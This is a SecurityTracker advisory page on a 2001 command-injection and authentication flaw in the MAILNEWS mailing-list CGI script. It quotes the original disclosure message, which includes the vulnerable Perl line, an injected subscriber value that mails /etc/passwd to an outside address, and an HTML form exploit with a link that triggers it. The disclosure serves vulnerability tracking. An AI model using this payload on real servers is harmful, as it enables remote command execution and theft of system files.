Mailnews Cgi Script May Execute Arbitrary Shell Commands Supplied By Unauthorized Users Via the Network - SecurityTracker

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

Home | View Topics | Search | Contact Us |

SecurityTracker
Archives

Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Web Server/CGI) > Mailnews

Vendors: Reuter, Claude

Mailnews Cgi Script May Execute Arbitrary Shell Commands Supplied By Unauthorized Users Via the Network

SecurityTracker Alert ID: 1000949

SecurityTracker URL: http://securitytracker.com/id/1000949

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Updated: Feb 28 2001

Original Entry Date: Feb 21 2001

Impact: Execution of arbitrary code via network, User access via network

Exploit Included: Yes

Version(s): 1.1, 1.3

Description: The cgi-based MAILNEWS mailing list management software reportedly contains several vulnerabilities that allow an attacker to remotely supply shell commands to be executed by the cgi script.

The most potentially serious vulnerability is that the software fails to appropriately filter certain input parameters. This allows an attacker to provide arbitrary shell commands to the cgi script that will be executed by the cgi script. In addition, the script does not properly protect and enforce passwords such that an unauthorized user without knowledge of the administrative password can add or delete users from an affected maillist.

The original message contains demonstration exploit code.

Impact: An attacker can remotely provide shell commands to be executed by the cgi script with the privileges of the cgi script.

Solution: No solution was available at the time of this entry.

Vendor URL: www.creuter.lu/programming/perl/index.asp (Links to External Site)

Cause: Authentication error, Input validation error

Underlying OS: Linux (Any), MacOS, UNIX (Any), Windows (Any)

Message History: None.

Source Message Contents

Date: Sun, 18 Feb 2001 22:04:54 +0000
Subject: CGI - mailnews.cgi vulnerability...


Hello BuGReaders...

##Script: mailnews.cgi

##Introduction:

<cat from source>
CGI-Script MAILNEWS 1.3
This script helps you to maintain a mailinglist.
</cat>

##Tested Version: 1.1, 1.3

Author dont parse some characters and he use very stupid "password
protection". We can add or delete users from maillist without known
admin password. But this is small problem ;] . Lets see what we can do
more.
<cat source>
	open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
</cat>
where $mailprog [default] is sendmail and $member is users from usersfile.
Now we can do something like this. Add user "; cat /etc/passwd | mail
adam@malysz.pl' and use subroutine to execute this code :]

Simple exploit in html:

<HTML>
<BODY>
<FORM
ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
<INPUT type=hidden NAME="action" value="subscribe">
<BR>
User to add with ;  [ex:" ; cat /etc/passwd |mail adam@malysz.pl"
without qoutas ofcoz ]<INPUT NAME="address" TYPE="TEXT">
<INPUT  TYPE="SUBMIT" VALUE="Submit">
</FORM>
<BR>
<A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news">
Execute command :] </A>
<CENTER> Peace... </CENTER>
</BODY>
</HTML>

Who :	Kanedaaa
	kaneda@ac.pl


***$$$###  " I moze bardzo wielu nie zrozumie tych slow...
		Ale nie ma litosci dla SKURWYSYNOW .... " ###$$*
kaneda@ac.pl Bohater ... Szef ... Abuser ... Cucumber Team Member... Bzz..

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
Copyright 2013, SecurityGlobal.net LLC